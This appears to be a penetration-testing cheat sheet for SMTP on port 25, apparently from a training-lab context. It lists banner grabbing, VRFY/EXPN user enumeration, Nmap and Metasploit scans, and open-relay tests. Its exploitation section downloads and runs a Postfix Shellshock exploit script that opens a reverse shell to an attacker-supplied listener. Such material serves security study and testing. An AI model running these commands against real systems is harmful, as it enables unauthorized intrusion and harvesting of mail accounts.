SMTP 25
SMTP Banner Grabbing
Using Netcat
nc -nv <target_ip> 25
Commands to test SMTP functionality:
VRFY root
VRFY test
Using Telnet
telnet <target_ip> 25
Nmap Enumeration
Common Nmap SMTP Scripts
locate .nse | grep smtp
Run the following Nmap command:
nmap --script smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 -p 25 <target_ip>
Scan for all SMTP-related scripts:
sudo nmap --script "smtp-*" -p 25 <target_ip>
Metasploit Enumeration
Enumerate Users
use auxiliary/scanner/smtp/smtp_enum
set RHOSTS <target_ip>
run
Exploitation
Postfix Shellshock Vulnerability
Using SearchSploit
sudo searchsploit -m linux/remote/34896.py
Run the exploit:
python2 34896.py <target_ip>
Using the Automated Script from GitHub
Download the script:
wget https://raw.githubusercontent.com/3mrgnc3/pentest_old/master/postfix-shellshock-nc.py
Set permissions and execute:
sudo chmod +x postfix-shellshock-nc.py
python2 postfix-shellshock-nc.py <target_ip> <valid-email> <lhost> <lport>
Example:
python2 postfix-shellshock-nc.py 10.11.1.231 useradm@mail.local 192.168.119.177 1234
Common Tests for Enumeration
Test for Open Relay
Manually test with Netcat or Telnet:
MAIL FROM:<test@test.com>
RCPT TO:<target@victim.com>
DATA
This is a test message.
.
QUIT
Test for VRFY Command
Use:
VRFY <username>
Test for EXPN Command
EXPN <username>
Useful Tools
Automated SMTP Enumeration Scripts
smtp-user-enum:
smtp-user-enum -M VRFY -U usernames.txt -t <target_ip>
Metasploit for User Enumeration:
use auxiliary/scanner/smtp/smtp_enum set RHOSTS <target_ip> set USER_FILE usernames.txt run
Last updated